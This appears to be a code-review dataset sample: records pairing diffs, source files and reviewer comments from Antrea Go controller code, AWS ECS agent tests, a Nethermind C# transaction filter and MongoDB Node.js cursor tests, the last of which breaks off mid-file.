filterInternalGroupsForNamespace(namespace *v1.Namespace) sets.String { matchingKeys := sets.String{} groups, _ := n.internalGroupStore.GetByIndex(cache.NamespaceIndex, "") for _, group := range groups { key, _ := store.GroupKeyFunc(group) g := group.(*antreatypes.Group) if g.Selector.NamespaceSelector != nil && g.Selector.NamespaceSelector.Matches(labels.Set(namespace.Labels)) { matchingKeys.Insert(key) klog.V(2).Infof("Namespace %s matched internal Group %s", namespace.Name, key) } } return matchingKeys } func (n *NetworkPolicyController) enqueueInternalGroup(key string) { klog.V(4).Infof("Adding new key %s to internal Group queue", key) n.internalGroupQueue.Add(key) } func (c *NetworkPolicyController) internalGroupWorker() { for c.processNextInternalGroupWorkItem() { } } // Processes an item in the "internalGroup" work queue, by calling // syncInternalGroup after casting the item to a string (Group key). // If syncInternalGroup returns an error, this function handles it by re-queueing // the item so that it can be processed again later. If syncInternalGroup is // successful, the ClusterGroup is removed from the queue until we get notify // of a new change. This function return false if and only if the work queue // was shutdown (no more items will be processed). func (c *NetworkPolicyController) processNextInternalGroupWorkItem() bool { key, quit := c.internalGroupQueue.Get() if quit { return false } defer c.internalGroupQueue.Done(key) err := c.syncInternalGroup(key.(string)) if err != nil { // Put the item back in the workqueue to handle any transient errors. c.internalGroupQueue.AddRateLimited(key) klog.Errorf("Failed to sync internal Group %s: %v", key, err) return true } // If no error occurs we Forget this item so it does not get queued again until // another change happens. c.internalGroupQueue.Forget(key) return true } func (n *NetworkPolicyController) syncInternalGroup(key string) error { // Retrieve the internal Group corresponding to this key. grpObj, found, _ := n.internalGroupStore.Get(key) if !found { klog.V(2).Infof("Internal group %s not found.", key) return nil } grp := grpObj.(*antreatypes.Group) if grp.IPBlock == nil { // Find all Pods matching its selectors and update store. groupSelector := grp.Selector pods, _ := n.processSelector(groupSelector) memberSet := controlplane.GroupMemberSet{} for _, pod := range pods { if len(pod.Status.PodIPs) == 0 { // No need to insert Pod IPAddress when it is unset. continue } memberSet.Insert(podToGroupMember(pod, true)) } // Update the internal Group object in the store with the Pods as GroupMembers. updatedGrp := &antreatypes.Group{ UID: grp.UID, Name: grp.Name, Selector: grp.Selector, GroupMembers: memberSet, } klog.V(2).Infof("Updating existing internal Group %s with %d GroupMembers", key, len(memberSet)) n.internalGroupStore.Update(updatedGrp) } // Retrieve the ClusterGroup corresponding to this key. cg, err := n.cgLister.Get(grp.Name) if err != nil { klog.Infof("Didn't find the ClusterGroup %s, skip processing of internal group", grp.Name) return nil } // Update the ClusterGroup status to Realized as Antrea has recognized the Group and // processed its group members. err = n.updateGroupStatus(cg, v1.ConditionTrue) if err != nil { klog.Errorf("Failed to update ClusterGroup %s GroupMembersComputed condition to %s: %v", cg.Name, v1.ConditionTrue, err) return err } return n.triggerCNPUpdates(cg) } // triggerCNPUpdates triggers processing of ClusterNetworkPolicies associated with the input ClusterGroup. func (n *NetworkPolicyController) triggerCNPUpdates(cg *corev1a2.ClusterGroup) error { // If a ClusterGroup is added/updated, it might have a reference in ClusterNetworkPolicy. cnps, err := n.cnpInformer.Informer().GetIndexer().ByIndex(ClusterGroupIndex, cg.Name) if err != nil { klog.Errorf("Error retrieving ClusterNetworkPolicies corresponding to ClusterGroup %s", cg.Name) return err } for _, obj := range cnps { cnp := obj.(*secv1alpha1.ClusterNetworkPolicy) // Re-process ClusterNetworkPolicies which may be affected due to updates to CG. curInternalNP := n.processClusterNetworkPolicy(cnp) klog.V(2).Infof("Updating existing internal NetworkPolicy %s for %s", curInternalNP.Name, curInternalNP.SourceRef.ToString()) key := internalNetworkPolicyKeyFunc(cnp) // Lock access to internal NetworkPolicy store such that concurrent access // to an internal NetworkPolicy is not allowed. This will avoid the // case in which an Update to an internal NetworkPolicy object may // cause the SpanMeta member to be overridden with stale SpanMeta members // from an older internal NetworkPolicy. n.internalNetworkPolicyMutex.Lock() oldInternalNPObj, _, _ := n.internalNetworkPolicyStore.Get(key) oldInternalNP := oldInternalNPObj.(*antreatypes.NetworkPolicy) // Must preserve old internal NetworkPolicy Span. curInternalNP.SpanMeta = oldInternalNP.SpanMeta n.internalNetworkPolicyStore.Update(curInternalNP) // Unlock the internal NetworkPolicy store. n.internalNetworkPolicyMutex.Unlock() // Enqueue addressGroup keys to update their group members. // TODO: optimize this to avoid enqueueing address groups when not updated. for _, atg := range curInternalNP.AppliedToGroups { n.enqueueAppliedToGroup(atg) } for _, rule := range curInternalNP.Rules { for _, addrGroupName := range rule.From.AddressGroups { n.enqueueAddressGroup(addrGroupName) } for _, addrGroupName := range rule.To.AddressGroups { n.enqueueAddressGroup(addrGroupName) } } n.enqueueInternalNetworkPolicy(key) n.deleteDereferencedAddressGroups(oldInternalNP) for _, atg := range oldInternalNP.AppliedToGroups { n.deleteDereferencedAppliedToGroup(atg) } } return nil } // updateGroupStatus updates the Status subresource for a ClusterGroup. func (n *NetworkPolicyController) updateGroupStatus(cg *corev1a2.ClusterGroup, cStatus v1.ConditionStatus) error { condStatus := corev1a2.GroupCondition{ Status: cStatus, Type: corev1a2.GroupMembersComputed, } if groupMembersComputedConditionEqual(cg.Status.Conditions, condStatus) { // There is no change in conditions. return nil } condStatus.LastTransitionTime = metav1.Now() status := corev1a2.GroupStatus{ Conditions: []corev1a2.GroupCondition{condStatus}, } klog.V(4).Infof("Updating ClusterGroup %s status to %#v", cg.Name, condStatus) toUpdate := cg.DeepCopy() toUpdate.Status = status _, err := n.crdClient.CoreV1alpha2().ClusterGroups().UpdateStatus(context.TODO(), toUpdate, metav1.UpdateOptions{}) return err } // groupMembersComputedConditionEqual checks whether the condition status for GroupMembersComputed condition // is same. Returns true if equal, otherwise returns false. It disregards the lastTransitionTime field. func groupMembersComputedConditionEqual(conds []corev1a2.GroupCondition, condition corev1a2.GroupCondition) bool { for _, c := range conds { if c.Type == corev1a2.GroupMembersComputed { if c.Status == condition.Status { return true } } } return false } // GetAssociatedGroups retrieves the internal Groups associated with the entity being // queried (Pod or ExternalEntity identified by name and namespace). func (n *NetworkPolicyController) GetAssociatedGroups(name, namespace string) ([]antreatypes.Group, error) { memberKey := k8s.NamespacedName(namespace, name) groups, err := n.internalGroupStore.GetByIndex(store.GroupMemberIndex, memberKey) if err != nil { return nil, fmt.Errorf("failed to retrieve Group associated with key %s", memberKey) } groupObjs := make([]antreatypes.Group, len(groups)) for i, g := range groups { groupObjs[i] = *g.(*antreatypes.Group) } return groupObjs, nil } // GetGroupMembers returns the current members of a ClusterGroup. func (n *NetworkPolicyController) GetGroupMembers(cgName string) (controlplane.GroupMemberSet, error) { g, found, err := n.internalGroupStore.Get(cgName) if err != nil || !found { return nil, fmt.Errorf("failed to get internal group associated with ClusterGroup %s", cgName) } internalGroup := g.(*antreatypes.Group) return internalGroup.GroupMembers, nil }
1
32,236
nit.. `if` .. `else` for logging probably can be avoided.. maybe only log that an internal group was created for cluster group
antrea-io-antrea
go
@@ -21,6 +21,7 @@ import ( "time" "github.com/aws/amazon-ecs-agent/agent/api" + "github.com/aws/amazon-ecs-agent/agent/config" "github.com/aws/amazon-ecs-agent/agent/engine/dockerstate/mocks" "github.com/aws/amazon-ecs-agent/agent/engine/testdata" "github.com/aws/amazon-ecs-agent/agent/eventstream"
1
// +build !integration // Copyright 2014-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved. // // Licensed under the Apache License, Version 2.0 (the "License"). You may // not use this file except in compliance with the License. A copy of the // License is located at // // http://aws.amazon.com/apache2.0/ // // or in the "license" file accompanying this file. This file is distributed // on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either // express or implied. See the License for the specific language governing // permissions and limitations under the License. package engine import ( "fmt" "sync" "testing" "time" "github.com/aws/amazon-ecs-agent/agent/api" "github.com/aws/amazon-ecs-agent/agent/engine/dockerstate/mocks" "github.com/aws/amazon-ecs-agent/agent/engine/testdata" "github.com/aws/amazon-ecs-agent/agent/eventstream" "github.com/aws/amazon-ecs-agent/agent/statechange" "github.com/aws/amazon-ecs-agent/agent/statemanager" "github.com/aws/amazon-ecs-agent/agent/utils/ttime/mocks" "github.com/stretchr/testify/assert" "github.com/golang/mock/gomock" "golang.org/x/net/context" ) func TestContainerNextState(t *testing.T) { testCases := []struct { containerCurrentStatus api.ContainerStatus containerDesiredStatus api.ContainerStatus expectedContainerStatus api.ContainerStatus expectedTransitionActionable bool expectedTransitionPossible bool }{ // NONE -> RUNNING transition is allowed and actionable, when desired is Running // The exptected next status is Pulled {api.ContainerStatusNone, api.ContainerRunning, api.ContainerPulled, true, true}, // NONE -> NONE transition is not be allowed and is not actionable, // when desired is Running {api.ContainerStatusNone, api.ContainerStatusNone, api.ContainerStatusNone, false, false}, // NONE -> STOPPED transition will result in STOPPED and is allowed, but not // actionable, when desired is STOPPED {api.ContainerStatusNone, api.ContainerStopped, api.ContainerStopped, false, true}, // PULLED -> RUNNING transition is allowed and actionable, when desired is Running // The exptected next status is Created {api.ContainerPulled, api.ContainerRunning, api.ContainerCreated, true, true}, // PULLED -> PULLED transition is not allowed and not actionable, // when desired is Running {api.ContainerPulled, api.ContainerPulled, api.ContainerStatusNone, false, false}, // PULLED -> NONE transition is not allowed and not actionable, // when desired is Running {api.ContainerPulled, api.ContainerStatusNone, api.ContainerStatusNone, false, false}, // PULLED -> STOPPED transition will result in STOPPED and is allowed, but not // actionable, when desired is STOPPED {api.ContainerPulled, api.ContainerStopped, api.ContainerStopped, false, true}, // CREATED -> RUNNING transition is allowed and actionable, when desired is Running // The exptected next status is Running {api.ContainerCreated, api.ContainerRunning, api.ContainerRunning, true, true}, // CREATED -> CREATED transition is not allowed and not actionable, // when desired is Running {api.ContainerCreated, api.ContainerCreated, api.ContainerStatusNone, false, false}, // CREATED -> NONE transition is not allowed and not actionable, // when desired is Running {api.ContainerCreated, api.ContainerStatusNone, api.ContainerStatusNone, false, false}, // CREATED -> PULLED transition is not allowed and not actionable, // when desired is Running {api.ContainerCreated, api.ContainerPulled, api.ContainerStatusNone, false, false}, // CREATED -> STOPPED transition will result in STOPPED and is allowed, but not // actionable, when desired is STOPPED {api.ContainerCreated, api.ContainerStopped, api.ContainerStopped, false, true}, // RUNNING -> STOPPED transition is allowed and actionable, when desired is Running // The exptected next status is STOPPED {api.ContainerRunning, api.ContainerStopped, api.ContainerStopped, true, true}, // RUNNING -> RUNNING transition is not allowed and not actionable, // when desired is Running {api.ContainerRunning, api.ContainerRunning, api.ContainerStatusNone, false, false}, // RUNNING -> NONE transition is not allowed and not actionable, // when desired is Running {api.ContainerRunning, api.ContainerStatusNone, api.ContainerStatusNone, false, false}, // RUNNING -> PULLED transition is not allowed and not actionable, // when desired is Running {api.ContainerRunning, api.ContainerPulled, api.ContainerStatusNone, false, false}, // RUNNING -> CREATED transition is not allowed and not actionable, // when desired is Running {api.ContainerRunning, api.ContainerCreated, api.ContainerStatusNone, false, false}, } for _, tc := range testCases { t.Run(fmt.Sprintf("%s to %s Transition", tc.containerCurrentStatus.String(), tc.containerDesiredStatus.String()), func(t *testing.T) { container := &api.Container{ DesiredStatusUnsafe: tc.containerDesiredStatus, KnownStatusUnsafe: tc.containerCurrentStatus, } task := &managedTask{ Task: &api.Task{ Containers: []*api.Container{ container, }, DesiredStatusUnsafe: api.TaskRunning, }, } nextStatus, actionRequired, possible := task.containerNextState(container) assert.Equal(t, tc.expectedContainerStatus, nextStatus, "Expected next state [%s] != Retrieved next state [%s]", tc.expectedContainerStatus.String(), nextStatus.String()) assert.Equal(t, tc.expectedTransitionActionable, actionRequired) assert.Equal(t, tc.expectedTransitionPossible, possible) }) } } func TestStartContainerTransitionsWhenForwardTransitionPossible(t *testing.T) { firstContainerName := "container1" firstContainer := &api.Container{ KnownStatusUnsafe: api.ContainerCreated, DesiredStatusUnsafe: api.ContainerRunning, Name: firstContainerName, } secondContainerName := "container2" secondContainer := &api.Container{ KnownStatusUnsafe: api.ContainerPulled, DesiredStatusUnsafe: api.ContainerRunning, Name: secondContainerName, } task := &managedTask{ Task: &api.Task{ Containers: []*api.Container{ firstContainer, secondContainer, }, DesiredStatusUnsafe: api.TaskRunning, }, engine: &DockerTaskEngine{}, } waitForAssertions := sync.WaitGroup{} waitForAssertions.Add(2) canTransition, transitions := task.startContainerTransitions( func(cont *api.Container, nextStatus api.ContainerStatus) { if cont.Name == firstContainerName { assert.Equal(t, nextStatus, api.ContainerRunning) } else if cont.Name == secondContainerName { assert.Equal(t, nextStatus, api.ContainerCreated) } waitForAssertions.Done() }) waitForAssertions.Wait() assert.True(t, canTransition) assert.NotEmpty(t, transitions) assert.Len(t, transitions, 2) firstContainerTransition, ok := transitions[firstContainerName] assert.True(t, ok) assert.Equal(t, firstContainerTransition, api.ContainerRunning) secondContainerTransition, ok := transitions[secondContainerName] assert.True(t, ok) assert.Equal(t, secondContainerTransition, api.ContainerCreated) } func TestStartContainerTransitionsWhenForwardTransitionIsNotPossible(t *testing.T) { firstContainerName := "container1" firstContainer := &api.Container{ KnownStatusUnsafe: api.ContainerRunning, DesiredStatusUnsafe: api.ContainerRunning, Name: firstContainerName, } secondContainerName := "container2" secondContainer := &api.Container{ KnownStatusUnsafe: api.ContainerRunning, DesiredStatusUnsafe: api.ContainerRunning, Name: secondContainerName, } task := &managedTask{ Task: &api.Task{ Containers: []*api.Container{ firstContainer, secondContainer, }, DesiredStatusUnsafe: api.TaskRunning, }, engine: &DockerTaskEngine{}, } canTransition, transitions := task.startContainerTransitions( func(cont *api.Container, nextStatus api.ContainerStatus) { t.Error("Transition function should not be called when no transitions are possible") }) assert.False(t, canTransition) assert.Empty(t, transitions) } func TestStartContainerTransitionsInvokesHandleContainerChange(t *testing.T) { eventStreamName := "TESTTASKENGINE" // Create a container with the intent to do // CREATERD -> STOPPED transition. This triggers // `managedTask.handleContainerChange()` and generates the following // events: // 1. container state change event for Submit* API // 2. task state change event for Submit* API // 3. container state change event for the internal event stream firstContainerName := "container1" firstContainer := &api.Container{ KnownStatusUnsafe: api.ContainerCreated, DesiredStatusUnsafe: api.ContainerStopped, Name: firstContainerName, } containerChangeEventStream := eventstream.NewEventStream(eventStreamName, context.Background()) containerChangeEventStream.StartListening() stateChangeEvents := make(chan statechange.Event) task := &managedTask{ Task: &api.Task{ Containers: []*api.Container{ firstContainer, }, DesiredStatusUnsafe: api.TaskRunning, }, engine: &DockerTaskEngine{ containerChangeEventStream: containerChangeEventStream, stateChangeEvents: stateChangeEvents, }, } eventsGenerated := sync.WaitGroup{} eventsGenerated.Add(2) containerChangeEventStream.Subscribe(eventStreamName, func(events ...interface{}) error { assert.NotNil(t, events) assert.Len(t, events, 1) event := events[0] containerChangeEvent, ok := event.(DockerContainerChangeEvent) assert.True(t, ok) assert.Equal(t, containerChangeEvent.Status, api.ContainerStopped) eventsGenerated.Done() return nil }) defer containerChangeEventStream.Unsubscribe(eventStreamName) // account for container and task state change events for Submit* API go func() { <-stateChangeEvents <-stateChangeEvents eventsGenerated.Done() }() canTransition, transitions := task.startContainerTransitions( func(cont *api.Container, nextStatus api.ContainerStatus) { t.Error("Invalid code path. The transition function should not be invoked when transitioning container from CREATED -> STOPPED") }) assert.True(t, canTransition) assert.Empty(t, transitions) eventsGenerated.Wait() } func TestWaitForContainerTransitionsForNonTerminalTask(t *testing.T) { acsMessages := make(chan acsTransition) dockerMessages := make(chan dockerContainerChange) task := &managedTask{ acsMessages: acsMessages, dockerMessages: dockerMessages, Task: &api.Task{ Containers: []*api.Container{}, }, } transitionChange := make(chan bool, 2) transitionChangeContainer := make(chan string, 2) firstContainerName := "container1" secondContainerName := "container2" // populate the transitions map with transitions for two // containers. We expect two sets of events to be consumed // by `waitForContainerTransitions` transitions := make(map[string]api.ContainerStatus) transitions[firstContainerName] = api.ContainerRunning transitions[secondContainerName] = api.ContainerRunning go func() { // Send "transitions completed" messages. These are being // sent out of order for no particular reason. We should be // resilient to the ordering of these messages anyway. transitionChange <- true transitionChangeContainer <- secondContainerName transitionChange <- true transitionChangeContainer <- firstContainerName }() // waitForContainerTransitions will block until it recieves events // sent by the go routine defined above task.waitForContainerTransitions(transitions, transitionChange, transitionChangeContainer) } // TestWaitForContainerTransitionsForTerminalTask verifies that the // `waitForContainerTransitions` method doesn't wait for any container // transitions when the task's desired status is STOPPED and if all // containers in the task are in PULLED state func TestWaitForContainerTransitionsForTerminalTask(t *testing.T) { acsMessages := make(chan acsTransition) dockerMessages := make(chan dockerContainerChange) task := &managedTask{ acsMessages: acsMessages, dockerMessages: dockerMessages, Task: &api.Task{ Containers: []*api.Container{}, KnownStatusUnsafe: api.TaskStopped, }, } transitionChange := make(chan bool, 2) transitionChangeContainer := make(chan string, 2) firstContainerName := "container1" secondContainerName := "container2" transitions := make(map[string]api.ContainerStatus) transitions[firstContainerName] = api.ContainerPulled transitions[secondContainerName] = api.ContainerPulled // Event though there are two keys in the transitions map, send // only one event. This tests that `waitForContainerTransitions` doesn't // block to recieve two events and will still progress go func() { transitionChange <- true transitionChangeContainer <- secondContainerName }() task.waitForContainerTransitions(transitions, transitionChange, transitionChangeContainer) } func TestOnContainersUnableToTransitionStateForDesiredStoppedTask(t *testing.T) { stateChangeEvents := make(chan statechange.Event) task := &managedTask{ Task: &api.Task{ Containers: []*api.Container{}, DesiredStatusUnsafe: api.TaskStopped, }, engine: &DockerTaskEngine{ stateChangeEvents: stateChangeEvents, }, } eventsGenerated := sync.WaitGroup{} eventsGenerated.Add(1) go func() { event := <-stateChangeEvents assert.Equal(t, event.(api.TaskStateChange).Reason, taskUnableToTransitionToStoppedReason) eventsGenerated.Done() }() task.onContainersUnableToTransitionState() eventsGenerated.Wait() assert.Equal(t, task.GetDesiredStatus(), api.TaskStopped) } func TestOnContainersUnableToTransitionStateForDesiredRunningTask(t *testing.T) { firstContainerName := "container1" firstContainer := &api.Container{ KnownStatusUnsafe: api.ContainerCreated, DesiredStatusUnsafe: api.ContainerRunning, Name: firstContainerName, } task := &managedTask{ Task: &api.Task{ Containers: []*api.Container{ firstContainer, }, DesiredStatusUnsafe: api.TaskRunning, }, } task.onContainersUnableToTransitionState() assert.Equal(t, task.GetDesiredStatus(), api.TaskStopped) assert.Equal(t, task.Containers[0].GetDesiredStatus(), api.ContainerStopped) } // TODO: Test progressContainers workflow // TODO: Test handleStoppedToRunningContainerTransition func TestCleanupTask(t *testing.T) { ctrl := gomock.NewController(t) mockTime := mock_ttime.NewMockTime(ctrl) mockState := mock_dockerstate.NewMockTaskEngineState(ctrl) mockClient := NewMockDockerClient(ctrl) mockImageManager := NewMockImageManager(ctrl) defer ctrl.Finish() taskEngine := &DockerTaskEngine{ saver: statemanager.NewNoopStateManager(), state: mockState, client: mockClient, imageManager: mockImageManager, } mTask := &managedTask{ Task: testdata.LoadTask("sleep5"), _time: mockTime, engine: taskEngine, acsMessages: make(chan acsTransition), dockerMessages: make(chan dockerContainerChange), } mTask.SetKnownStatus(api.TaskStopped) mTask.SetSentStatus(api.TaskStopped) container := mTask.Containers[0] dockerContainer := &api.DockerContainer{ DockerName: "dockerContainer", } // Expectations for triggering cleanup now := mTask.GetKnownStatusTime() taskStoppedDuration := 1 * time.Minute mockTime.EXPECT().Now().Return(now).AnyTimes() cleanupTimeTrigger := make(chan time.Time) mockTime.EXPECT().After(gomock.Any()).Return(cleanupTimeTrigger) go func() { cleanupTimeTrigger <- now }() // Expectations to verify that the task gets removed mockState.EXPECT().ContainerMapByArn(mTask.Arn).Return(map[string]*api.DockerContainer{container.Name: dockerContainer}, true) mockClient.EXPECT().RemoveContainer(dockerContainer.DockerName, gomock.Any()).Return(nil) mockImageManager.EXPECT().RemoveContainerReferenceFromImageState(container).Return(nil) mockState.EXPECT().RemoveTask(mTask.Task) mTask.cleanupTask(taskStoppedDuration) } func TestCleanupTaskWaitsForStoppedSent(t *testing.T) { ctrl := gomock.NewController(t) mockTime := mock_ttime.NewMockTime(ctrl) mockState := mock_dockerstate.NewMockTaskEngineState(ctrl) mockClient := NewMockDockerClient(ctrl) mockImageManager := NewMockImageManager(ctrl) defer ctrl.Finish() taskEngine := &DockerTaskEngine{ saver: statemanager.NewNoopStateManager(), state: mockState, client: mockClient, imageManager: mockImageManager, } mTask := &managedTask{ Task: testdata.LoadTask("sleep5"), _time: mockTime, engine: taskEngine, acsMessages: make(chan acsTransition), dockerMessages: make(chan dockerContainerChange), } mTask.SetKnownStatus(api.TaskStopped) mTask.SetSentStatus(api.TaskRunning) container := mTask.Containers[0] dockerContainer := &api.DockerContainer{ DockerName: "dockerContainer", } // Expectations for triggering cleanup now := mTask.GetKnownStatusTime() taskStoppedDuration := 1 * time.Minute mockTime.EXPECT().Now().Return(now).AnyTimes() cleanupTimeTrigger := make(chan time.Time) mockTime.EXPECT().After(gomock.Any()).Return(cleanupTimeTrigger) go func() { cleanupTimeTrigger <- now }() timesCalled := 0 callsExpected := 3 mockTime.EXPECT().Sleep(gomock.Any()).AnyTimes().Do(func(_ interface{}) { timesCalled++ if timesCalled == callsExpected { mTask.SetSentStatus(api.TaskStopped) } else if timesCalled > callsExpected { t.Errorf("Sleep called too many times, called %d but expected %d", timesCalled, callsExpected) } }) assert.Equal(t, api.TaskRunning, mTask.GetSentStatus()) // Expectations to verify that the task gets removed mockState.EXPECT().ContainerMapByArn(mTask.Arn).Return(map[string]*api.DockerContainer{container.Name: dockerContainer}, true) mockClient.EXPECT().RemoveContainer(dockerContainer.DockerName, gomock.Any()).Return(nil) mockImageManager.EXPECT().RemoveContainerReferenceFromImageState(container).Return(nil) mockState.EXPECT().RemoveTask(mTask.Task) mTask.cleanupTask(taskStoppedDuration) assert.Equal(t, api.TaskStopped, mTask.GetSentStatus()) } func TestCleanupTaskGivesUpIfWaitingTooLong(t *testing.T) { ctrl := gomock.NewController(t) mockTime := mock_ttime.NewMockTime(ctrl) mockState := mock_dockerstate.NewMockTaskEngineState(ctrl) mockClient := NewMockDockerClient(ctrl) mockImageManager := NewMockImageManager(ctrl) defer ctrl.Finish() taskEngine := &DockerTaskEngine{ saver: statemanager.NewNoopStateManager(), state: mockState, client: mockClient, imageManager: mockImageManager, } mTask := &managedTask{ Task: testdata.LoadTask("sleep5"), _time: mockTime, engine: taskEngine, acsMessages: make(chan acsTransition), dockerMessages: make(chan dockerContainerChange), } mTask.SetKnownStatus(api.TaskStopped) mTask.SetSentStatus(api.TaskRunning) // Expectations for triggering cleanup now := mTask.GetKnownStatusTime() taskStoppedDuration := 1 * time.Minute mockTime.EXPECT().Now().Return(now).AnyTimes() cleanupTimeTrigger := make(chan time.Time) mockTime.EXPECT().After(gomock.Any()).Return(cleanupTimeTrigger) go func() { cleanupTimeTrigger <- now }() _maxStoppedWaitTimes = 10 defer func() { // reset _maxStoppedWaitTimes = int(maxStoppedWaitTimes) }() mockTime.EXPECT().Sleep(gomock.Any()).Times(_maxStoppedWaitTimes) assert.Equal(t, api.TaskRunning, mTask.GetSentStatus()) // No cleanup expected mTask.cleanupTask(taskStoppedDuration) assert.Equal(t, api.TaskRunning, mTask.GetSentStatus()) }
1
15,833
There's a lot of changed tests -- but no new tests. You need unit and integration tests for this.
aws-amazon-ecs-agent
go
@@ -38,16 +38,16 @@ namespace Nethermind.TxPool.Filters _configuredGasLimit = txPoolConfig.GasLimit ?? long.MaxValue; } - public (bool Accepted, AddTxResult? Reason) Accept(Transaction tx, TxHandlingOptions handlingOptions) + public AcceptTxResult Accept(Transaction tx, TxHandlingOptions handlingOptions) { long gasLimit = Math.Min(_chainHeadInfoProvider.BlockGasLimit ?? long.MaxValue, _configuredGasLimit); if (tx.GasLimit > gasLimit) { if (_logger.IsTrace) _logger.Trace($"Skipped adding transaction {tx.ToString(" ")}, gas limit exceeded."); - return (false, AddTxResult.GasLimitExceeded); + return AcceptTxResult.GasLimitExceeded; } - return (true, null); + return AcceptTxResult.Accepted; } } }
1
// Copyright (c) 2021 Demerzel Solutions Limited // This file is part of the Nethermind library. // // The Nethermind library is free software: you can redistribute it and/or modify // it under the terms of the GNU Lesser General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // The Nethermind library is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU Lesser General Public License for more details. // // You should have received a copy of the GNU Lesser General Public License // along with the Nethermind. If not, see <http://www.gnu.org/licenses/>. // using System; using Nethermind.Core; using Nethermind.Logging; namespace Nethermind.TxPool.Filters { /// <summary> /// Ignores transactions that outright exceed block gas limit or configured max block gas limit. /// </summary> internal class GasLimitTxFilter : IIncomingTxFilter { private readonly IChainHeadInfoProvider _chainHeadInfoProvider; private readonly ILogger _logger; private readonly long _configuredGasLimit; public GasLimitTxFilter(IChainHeadInfoProvider chainHeadInfoProvider, ITxPoolConfig txPoolConfig, ILogger logger) { _chainHeadInfoProvider = chainHeadInfoProvider; _logger = logger; _configuredGasLimit = txPoolConfig.GasLimit ?? long.MaxValue; } public (bool Accepted, AddTxResult? Reason) Accept(Transaction tx, TxHandlingOptions handlingOptions) { long gasLimit = Math.Min(_chainHeadInfoProvider.BlockGasLimit ?? long.MaxValue, _configuredGasLimit); if (tx.GasLimit > gasLimit) { if (_logger.IsTrace) _logger.Trace($"Skipped adding transaction {tx.ToString(" ")}, gas limit exceeded."); return (false, AddTxResult.GasLimitExceeded); } return (true, null); } } }
1
26,435
WithMessage what gas limit is?
NethermindEth-nethermind
.cs
@@ -2099,7 +2099,7 @@ describe('Cursor', function() { * @ignore * @api private */ - it('cursor stream errors', { + it.skip('cursor stream errors', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single'] } },
1
'use strict'; const test = require('./shared').assert; const setupDatabase = require('./shared').setupDatabase; const fs = require('fs'); const expect = require('chai').expect; const Long = require('bson').Long; const sinon = require('sinon'); const ReadPreference = require('mongodb-core').ReadPreference; const Buffer = require('safe-buffer').Buffer; describe('Cursor', function() { before(function() { return setupDatabase(this.configuration, [ 'cursorkilltest1', 'cursor_session_tests', 'cursor_session_tests2' ]); }); /** * @ignore * @api private */ it('cursorShouldBeAbleToResetOnToArrayRunningQueryAgain', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_to_a', function(err, collection) { test.equal(null, err); collection.insert({ a: 1 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); var cursor = collection.find({}); cursor.toArray(function(err) { test.equal(null, err); // Should fail if called again (cursor should be closed) cursor.toArray(function(err) { test.equal(null, err); // Should fail if called again (cursor should be closed) cursor.each(function(err, item) { test.equal(null, err); // Let's close the db if (!item) { client.close(); done(); } }); }); }); }); }); }); } }); /** * @ignore * @api private */ it('cursor should close after first next operation', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('close_on_next', function(err, collection) { test.equal(null, err); collection.insert( [{ a: 1 }, { a: 1 }, { a: 1 }], configuration.writeConcernMax(), function(err) { test.equal(null, err); var cursor = collection.find({}); cursor.batchSize(2); cursor.next(function(err) { test.equal(null, err); cursor.close(); client.close(); done(); }); } ); }); }); } }); /** * @ignore * @api private */ it('cursor should trigger getMore', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('trigger_get_more', function(err, collection) { test.equal(null, err); collection.insert( [{ a: 1 }, { a: 1 }, { a: 1 }], configuration.writeConcernMax(), function(err) { test.equal(null, err); var cursor = collection.find({}); cursor.batchSize(2); cursor.toArray(function(err) { test.equal(null, err); client.close(); done(); }); } ); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyExecuteCursorExplain', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_explain', function(err, collection) { test.equal(null, err); collection.insert({ a: 1 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); collection.find({ a: 1 }).explain(function(err, explaination) { test.equal(null, err); test.ok(explaination != null); // Let's close the db client.close(); done(); }); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyExecuteCursorCount', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('test_count', function(err, collection) { test.equal(null, err); collection.find().count(function(err) { test.equal(null, err); function insert(callback) { var total = 10; for (var i = 0; i < 10; i++) { collection.insert({ 